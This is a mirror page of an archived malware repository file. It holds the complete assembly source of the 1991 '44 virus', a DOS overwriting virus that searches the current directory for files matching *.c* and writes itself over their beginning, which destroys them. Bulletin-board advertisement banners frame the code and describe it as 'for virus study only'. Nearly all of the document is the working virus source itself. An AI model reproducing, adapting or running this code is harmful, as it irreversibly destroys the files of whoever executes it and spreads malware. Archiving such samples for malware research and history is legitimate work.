mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-24 20:35:25 +00:00
100 lines
5.3 KiB
NASM
100 lines
5.3 KiB
NASM
|
;****************************************************************************;
|
|||
|
; ;
|
|||
|
; -=][][][][][][][][][][][][][][][=- ;
|
|||
|
; -=] P E R F E C T C R I M E [=- ;
|
|||
|
; -=] +31.(o)79.426o79 [=- ;
|
|||
|
; -=] [=- ;
|
|||
|
; -=] For All Your H/P/A/V Files [=- ;
|
|||
|
; -=] SysOp: Peter Venkman [=- ;
|
|||
|
; -=] [=- ;
|
|||
|
; -=] +31.(o)79.426o79 [=- ;
|
|||
|
; -=] P E R F E C T C R I M E [=- ;
|
|||
|
; -=][][][][][][][][][][][][][][][=- ;
|
|||
|
; ;
|
|||
|
; *** NOT FOR GENERAL DISTRIBUTION *** ;
|
|||
|
; ;
|
|||
|
; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
|
|||
|
; Around Among the General Public. It Will be Very Useful for Learning how ;
|
|||
|
; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
|
|||
|
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
|
|||
|
; Experience can Turn it Into a far More Malevolent Program Than it Already ;
|
|||
|
; Is. Keep This Code in Responsible Hands! ;
|
|||
|
; ;
|
|||
|
;****************************************************************************;
|
|||
|
;******************************************************************************
|
|||
|
;* 44-virus version 1.0
|
|||
|
;*
|
|||
|
;* Assemble with Tasm 1.01
|
|||
|
;*
|
|||
|
;* The 44 virus is a non-resident overwriting virus with a lenght
|
|||
|
;* of 44 bytes. It will infect all files with the extension .C*
|
|||
|
;* in the current directory.
|
|||
|
;*
|
|||
|
;* (c) 1991 Dark Helmet
|
|||
|
;*
|
|||
|
;* The author is not responsible for any damage caused by the virus
|
|||
|
;*
|
|||
|
;******************************************************************************
|
|||
|
|
|||
|
virus segment
|
|||
|
org 100h
|
|||
|
assume cs:virus
|
|||
|
|
|||
|
len equ offset last-100h
|
|||
|
|
|||
|
start: mov ah,04eh ; Search first file with extension .c*
|
|||
|
xor cx,cx ; Only normal files
|
|||
|
lea dx,com_mask ;
|
|||
|
int 21h
|
|||
|
|
|||
|
open_file: mov ax,3d02h ; open file for read/write
|
|||
|
mov dx,9eh
|
|||
|
int 21h
|
|||
|
|
|||
|
Infect: mov cx,len ; Write virus to start of file
|
|||
|
lea dx,start
|
|||
|
mov ah,40h
|
|||
|
int 21h
|
|||
|
|
|||
|
Next: mov ah,3eh ; Close file
|
|||
|
int 21h
|
|||
|
mov ah,4fh ; Search next file
|
|||
|
int 21h
|
|||
|
jnb open_file ; Are there any files left?
|
|||
|
|
|||
|
com_mask: db "*.c*",0 ; mask
|
|||
|
last: db 090h
|
|||
|
|
|||
|
virus ends
|
|||
|
end start
|
|||
|
|
|||
|
;****************************************************************************;
|
|||
|
; ;
|
|||
|
; -=][][][][][][][][][][][][][][][=- ;
|
|||
|
; -=] P E R F E C T C R I M E [=- ;
|
|||
|
; -=] +31.(o)79.426o79 [=- ;
|
|||
|
; -=] [=- ;
|
|||
|
; -=] For All Your H/P/A/V Files [=- ;
|
|||
|
; -=] SysOp: Peter Venkman [=- ;
|
|||
|
; -=] [=- ;
|
|||
|
; -=] +31.(o)79.426o79 [=- ;
|
|||
|
; -=] P E R F E C T C R I M E [=- ;
|
|||
|
; -=][][][][][][][][][][][][][][][=- ;
|
|||
|
; ;
|
|||
|
; *** NOT FOR GENERAL DISTRIBUTION *** ;
|
|||
|
; ;
|
|||
|
; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
|
|||
|
; Around Among the General Public. It Will be Very Useful for Learning how ;
|
|||
|
; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
|
|||
|
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
|
|||
|
; Experience can Turn it Into a far More Malevolent Program Than it Already ;
|
|||
|
; Is. Keep This Code in Responsible Hands! ;
|
|||
|
; ;
|
|||
|
;****************************************************************************;
|
|||
|
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> and Remember Don't Forget to Call <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;
|
|||
|
|